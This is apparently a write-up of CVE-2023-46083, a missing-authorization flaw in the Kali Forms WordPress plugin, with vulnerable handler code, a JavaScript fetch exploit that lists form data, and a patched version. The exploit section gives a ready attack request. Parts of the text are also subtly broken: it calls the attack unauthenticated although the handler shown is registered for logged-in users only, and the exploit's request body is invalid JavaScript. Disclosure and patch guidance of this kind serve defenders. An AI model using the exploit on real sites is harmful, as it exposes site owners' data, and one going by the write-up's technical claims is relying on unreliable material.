CVE-2023-46083 - Missing Authorization Vulnerability in Kali Forms Contact Form Builder with Drag & Drop: Exploiting Incorrectly Configured Access Control Security Levels

Kali Forms, a popular and easy-to-use contact form builder plugin for creating contact forms on WordPress websites, has been found to have a critical security vulnerability, specially referencing the CVE-2023-46083. The vulnerability, which affects Kali Forms versions up to 2.3.27, involves missing authorization checks in access control, potentially exposing sensitive information and control of forms to unauthorized users.

In this article, we will explore the details of this vulnerability, provide code snippets demonstrating how the vulnerability can be exploited, and link to original references for further reading. We will also provide suggestions for preventing such vulnerabilities in the future.

Description of the Vulnerability

The vulnerability in question stems from missing authorization checks within the Kali Forms plugin, specifically when handling the Ajax requests for contact form data. The plugin's code does not properly validate whether users have the necessary permissions to access, modify, or delete form data. As a result, even users without appropriate access permissions can potentially exploit the plugin to obtain sensitive information or alter form contents.

To demonstrate this vulnerability in action, let's take a look at a code snippet from Kali Forms version 2.2.1:

// In file: includes/ajax-endpoints.php

add_action('wp_ajax_kaliforms_forms', function () {
    $forms_repository = new FormRepository(Database::instance());
    echo json_encode(['list' => $forms_repository->get_forms()]);
});

Here, the plugin's code is adding an action to handle Ajax requests for the "kaliforms_forms" action. There are two main issues with this code:

No nonce check is performed to ensure the request originates from a trusted source.

2. No capability check is performed to ensure the user performing the request has the required permissions.

These two issues combined make it possible for a malicious user to send carefully crafted requests to the WordPress site and obtain contact form information, even if they do not have appropriate access rights.

Exploit Details

Given the code snippet above, exploiting this vulnerability is quite simple. An attacker could send an unauthenticated Ajax request to the WordPress site, asking for a list of contact forms created with the Kali Forms plugin:

// In file: exploit.js

fetch(ajaxurl, {
  method: 'POST',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  body: action=kaliforms_forms
})
  .then(response => response.json())
  .then(data => console.log(data));

If successful, this request would return an array containing data about all contact forms created using Kali Forms, including sensitive information such as form IDs, names, and field data.

Prevention and Mitigation

In order to prevent such vulnerabilities from occurring, proper access control checks and nonce checks should be implemented in the code. For instance, the vulnerable code in the Kali Forms plugin can be modified to include a nonce check and a capability check like so:

// In file: includes/ajax-endpoints.php

add_action('wp_ajax_kaliforms_forms', function () {
    // Check nonce
    check_ajax_referer('kaliforms_nonce', '_wpnonce', true);

    // Check capabilities
    if (!current_user_can('manage_options')) {
        wp_send_json_error('Unauthorized user');
        return;
    }

    $forms_repository = new FormRepository(Database::instance());
    echo json_encode(['list' => $forms_repository->get_forms()]);
});

By including these additional security checks, Kali Forms would be much less vulnerable to exploitation through unauthorized Ajax requests.

References

For more information on this vulnerability and related security issues, refer to the following references:

1. CVE-2023-46083 - Vulnerability details on MITRE.org
2. Kali Forms Changelog - Plugin's changelog, which includes a fix for this issue in version 2.3.28
3. WordPress Codex - Nonces - Documentation on using nonces in WordPress for security purposes
4. WordPress Codex - Roles and Capabilities - Documentation on handling user roles and capabilities in WordPress

In conclusion, this vulnerability in the Kali Forms Contact Form Builder with drag & drop plugin - CVE-2023-46083, can expose sensitive information about website forms to unauthorized users. By implementing proper nonce and capability checks, this vulnerability can be mitigated, and the security of the plugin can be improved.

Timeline

Published on: 01/02/2025 12:15:10 UTC